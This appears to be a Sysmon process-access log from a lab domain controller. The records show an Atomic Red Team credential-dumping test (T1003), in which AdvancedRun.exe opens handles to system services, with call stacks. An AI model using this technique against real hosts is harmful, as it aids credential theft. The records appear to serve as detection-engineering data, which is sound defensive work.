17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
